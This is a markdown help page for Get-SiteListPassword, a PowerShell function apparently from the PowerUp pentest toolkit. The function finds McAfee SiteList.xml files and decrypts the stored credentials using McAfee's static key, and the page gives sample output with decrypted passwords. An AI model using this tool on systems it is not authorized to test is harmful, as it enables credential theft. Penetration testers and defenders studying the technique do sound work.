# Get-SiteListPassword
## SYNOPSIS
Retrieves the plaintext passwords from any McAfee SiteList.xml files found.
Based on Jerome Nokin (@funoverip)'s Python solution (see the related links).

Author: Jerome Nokin (@funoverip)
PowerShell Port: @harmj0y
License: BSD 3-Clause
Required Dependencies: None
## SYNTAX
```
Get-SiteListPassword [[-Path] <String[]>]
```
## DESCRIPTION
Searches for any McAfee SiteList.xml in C:\Program Files\, C:\Program Files (x86)\,
C:\Documents and Settings\, or C:\Users\. For any files found, the appropriate
credential fields are extracted and decrypted using the internal
Get-DecryptedSitelistPassword function, which takes advantage of McAfee's static key
encryption. Any decrypted credentials are output in custom objects. See the related
links for more information.
## EXAMPLES
### -------------------------- EXAMPLE 1 --------------------------
```
Get-SiteListPassword
```
```
EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
UserName    :
Path        : Products/CommonUpdater
Name        : McAfeeHttp
DecPassword : MyStrongPassword!
Enabled     : 1
DomainName  :
Server      : update.nai.com:80

EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
UserName    : McAfeeService
Path        : Repository$
Name        : Paris
DecPassword : MyStrongPassword!
Enabled     : 1
DomainName  : companydomain
Server      : paris001

EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
UserName    : McAfeeService
Path        : Repository$
Name        : Tokyo
DecPassword : MyStrongPassword!
Enabled     : 1
DomainName  : companydomain
Server      : tokyo000
```
## PARAMETERS
### -Path
Optional path to a SiteList.xml file or folder.
```yaml
Type: String[]
Parameter Sets: (All)
Aliases:
Required: False
Position: 1
Default value: None
Accept pipeline input: True (ByValue)
Accept wildcard characters: False
```
## INPUTS
## OUTPUTS
### PowerUp.SiteListPassword
## NOTES
## RELATED LINKS
[https://github.com/funoverip/mcafee-sitelist-pwd-decryption/](https://github.com/funoverip/mcafee-sitelist-pwd-decryption/)

[https://funoverip.net/2016/02/mcafee-sitelist-xml-password-decryption/](https://funoverip.net/2016/02/mcafee-sitelist-xml-password-decryption/)

[https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md](https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md)

[https://www.syss.de/fileadmin/dokumente/Publikationen/2011/SySS_2011_Deeg_Privilege_Escalation_via_Antivirus_Software.pdf](https://www.syss.de/fileadmin/dokumente/Publikationen/2011/SySS_2011_Deeg_Privilege_Escalation_via_Antivirus_Software.pdf)